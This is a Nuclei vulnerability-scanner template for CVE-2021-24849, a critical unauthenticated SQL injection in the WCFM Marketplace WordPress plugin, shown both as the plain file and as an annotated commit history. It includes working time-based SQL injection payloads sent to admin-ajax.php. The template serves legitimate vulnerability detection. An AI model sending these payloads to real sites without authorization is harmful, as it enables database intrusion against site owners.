nuclei-templates/http/cves/2021/CVE-2021-24849.yaml

id: CVE-2021-24849

info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.00199
    epss-percentile: 0.56492
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wclovers
    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}

    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`id: CVE-2021-24849`

			`info:`
			`name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection`
			`author: ritikchaddha`
			`severity: critical`
			`description: \|`
			`The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.`
			`remediation: Fixed in 3.4.12`
			`reference:`
			`- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24849`
minor update 2024-02-13 05:14:17 +00:00			`- https://wordpress.org/plugins/wc-multivendor-marketplace/`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2021-24849`
			`cwe-id: CWE-89`
			`epss-score: 0.00199`
			`epss-percentile: 0.56492`
			`cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible::::::wordpress::*`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`metadata:`
			`verified: true`
minor update 2024-02-13 05:14:17 +00:00			`max-request: 1`
			`vendor: wclovers`
			`product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible`
			`framework: wordpress`
			`publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"`
			`tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli`

			`flow: http(1) && http(2)`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1`
			`Host: {{Hostname}}`

minor update 2024-02-13 05:14:17 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")`
			`condition: and`
			`internal: true`

			`- raw:`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`- \|`
			`@timeout: 20s`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`{{post_data}}`

			`payloads:`
			`post_data:`
			`- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"`
			- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

			`stop-at-first-match: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
minor update 2024-02-13 05:14:17 +00:00			`- 'duration>=5'`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`- 'status_code == 200'`
minor update 2024-02-13 05:14:17 +00:00			`- 'contains(header, "application/json")'`
			`- 'contains(body, "success")'`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`condition: and`
Auto Template Signing [Tue Feb 13 08:32:28 UTC 2024] :robot: 2024-02-13 08:32:28 +00:00			`# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950`